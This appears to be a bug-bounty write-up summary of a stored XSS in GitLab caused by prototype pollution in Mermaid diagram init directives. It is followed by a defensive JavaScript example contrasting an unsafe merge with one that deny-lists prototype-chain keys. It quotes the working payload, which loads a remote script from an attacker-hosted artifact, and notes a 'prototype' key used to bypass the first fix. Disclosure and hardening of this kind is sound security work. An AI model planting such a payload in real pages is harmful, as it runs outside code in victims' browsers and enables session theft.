[GitLab] Stored XSS via Mermaid Prototype Pollution vulnerability ($3000 USD)
We discussed this vulnerability during Episode 103 on 29 November 2021
Prototype pollution through a Mermaid diagram embedded in markdown leading to stored XSS.
Rather than trying to describe how Mermaid works, the payload itself shows the issue clearly. The init directive allows setting a `__proto__` key (and a `prototype` key was used to bypass the first fix). This can be used to pollute the `template` field, which enabled XSS.
%%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js> </script>\">'}} }%%
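To show the failure mode described above from the defender's side, here is an added example (not GitLab's or Mermaid's own code): an unsafe deep merge of a user-supplied init object, which walks into `Object.prototype` through a `__proto__` key, next to a hardened merge that rejects the prototype-chain keys (`__proto__`, `prototype`, and `constructor`, the standard deny list) and only writes into null-prototype objects. The directive body is a constructed sample with a harmless value, and the function names are assumptions.

```javascript
// Added example, not Mermaid's or GitLab's code. Demonstrates why merging a
// user-controlled init config must refuse prototype-chain keys.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Unsafe deep merge: target["__proto__"] resolves to Object.prototype, so a
// nested "template" key ends up on every plain object in the realm.
function unsafeMerge(target, src) {
  for (const key of Object.keys(src)) {
    const val = src[key];
    if (val && typeof val === "object" && !Array.isArray(val)) {
      if (typeof target[key] !== "object" || target[key] === null) target[key] = {};
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened merge: deny-list the chain keys, check own properties only, and
// create nested containers with no prototype so there is nothing to pollute.
function safeMerge(target, src) {
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) throw new Error(`rejected init config key: ${key}`);
    const val = src[key];
    if (val && typeof val === "object" && !Array.isArray(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key)) target[key] = Object.create(null);
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Constructed directive body: same shape as the write-up's payload, harmless value.
const SAMPLE_INIT = '{"__proto__": {"template": "POLLUTED"}}';

// Returns true if applying SAMPLE_INIT through mergeFn polluted a fresh object.
function pollutes(mergeFn) {
  const config = JSON.parse(SAMPLE_INIT); // JSON.parse yields an own "__proto__" key
  try {
    mergeFn({}, config);
  } catch (e) {
    return false; // the hardened merge refuses the key before writing anything
  }
  const hit = {}.template === "POLLUTED";
  delete Object.prototype.template; // clean up so later checks start from a clean realm
  return hit;
}
```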